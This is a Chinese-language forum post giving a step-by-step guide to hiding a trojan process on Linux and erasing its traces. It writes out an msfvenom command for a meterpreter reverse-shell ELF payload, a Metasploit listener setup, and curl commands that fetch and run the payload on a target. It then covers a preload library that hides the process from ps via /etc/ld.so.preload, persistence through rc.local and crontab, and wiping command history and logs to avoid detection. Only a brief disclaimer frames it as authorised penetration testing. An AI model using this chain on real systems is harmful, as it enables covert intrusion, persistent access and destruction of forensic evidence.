论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
应用中心
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
qidao123.com技术社区-IT企服评测·应用市场
»
论坛
›
安全
›
终端安全
›
Linux安全深度剖析:隐藏木马历程与痕迹清算技术指南 ...
Linux安全深度剖析:隐藏木马历程与痕迹清算技术指南 ...
魏晓东
论坛元老
|
2024-7-25 12:28:27
|
显示全部楼层
|
阅读模式
楼主
主题
1835
|
帖子
1835
|
积分
5505
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
隐藏历程名的具体步骤:
环境准备
:
确保你有两台呆板:一台作为攻击者(Kali Linux),另一台作为目标(CentOS 7.6)。
设置网络,使两者可以互相访问。
生成Payload
:
在Kali Linux上利用msfvenom下令生成一个payload:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -f elf -o /var/www/html/xuegod-ghost
复制代码
这个下令会创建一个ELF格式的文件,用于在目标体系上执行。
启动Web服务
:
在Kali Linux上启动Apache服务以提供payload下载:
systemctl start apache2
复制代码
设置Metasploit侦听器
:
在Kali Linux上设置Metasploit Framework侦听器:
msfdb run
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.53
set lport 4444
run
复制代码
下载并运行Payload
:
在CentOS目标体系上下载payload并运行:
curl http://192.168.1.53/xuegod-ghost -o xuegod-ghost
chmod +x xuegod-ghost
./xuegod-ghost &
复制代码
隐藏历程
:
编写一个恶意库文件(如processhider.c),该文件将被加载到全部历程中,并隐藏特定的历程名。
上传和编译恶意库
:
将processhider.c上传到CentOS体系,并编译成共享库(如libc2.28.so):
gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl
复制代码
设置/etc/ld.so.preload
:
将编译好的恶意库文件路径添加到/etc/ld.so.preload文件中,以便体系在执行步伐时主动加载:
echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload
复制代码
重新创建侦听
:
在Metasploit上重新启动侦听器以连接隐藏的历程。
运行隐藏的Payload
:
再次运行xuegod-ghost,此时该历程不会出现在ps下令的输出中。
恢复历程可见性
:
删除恶意库文件并清空/etc/ld.so.preload文件以恢复历程的可见性:
rm -rf /usr/local/lib/libc2.28.so
echo > /etc/ld.so.preload
复制代码
脚本主动化
:
创建一个主动化脚本(如x.sh),该脚本主动化下载、编译、执行payload,以及设置隐藏历程。
设置开机启动和筹划任务
:
将脚本添加到/etc/rc.d/rc.local以实现开机自启动,或在/etc/crontab中设置筹划任务。
体系日志清算
:
清算体系日志以减少被发现的痕迹,包罗删除历史下令和访问日志。
注意事项:
隐藏历程的技术可以用于躲避检测,但应当在合法的渗透测试和安全研究中利用。
确保你有得当的权限和授权来对目标体系举行操纵。
清算日志时要谨慎,以制止破坏体系的正常运行。
通过上述步骤,你可以在Linux体系中隐藏木马步伐历程,使其在常规的历程查察工具中不可见。这种技术在渗透测试中非常有用,但也大概被用于恶意目标,因此利用时必要严酷服从法律和道德规范。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
继续阅读请点击广告
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
魏晓东
论坛元老
这个人很懒什么都没写!
楼主热帖
基础常用dos命令
Vulnhub靶机-Al-Web-1
Unity技术手册 - Shader实现灵魂状态 ...
.NET主流的几款重量级 ORM框架 ...
云原生之旅 - 14)遵循 GitOps 实践的 ...
火山引擎 DataLeap 计算治理自动化解决 ...
Java集合框架(三)-HashSet
vuluhub_jangow-01-1.0.1
Android studio连接MySQL并完成简单的 ...
2022年总结-博客篇
标签云
国产数据库
集成商
AI
运维
CIO
存储
服务器
浏览过的版块
开源技术
快速回复
返回顶部
返回列表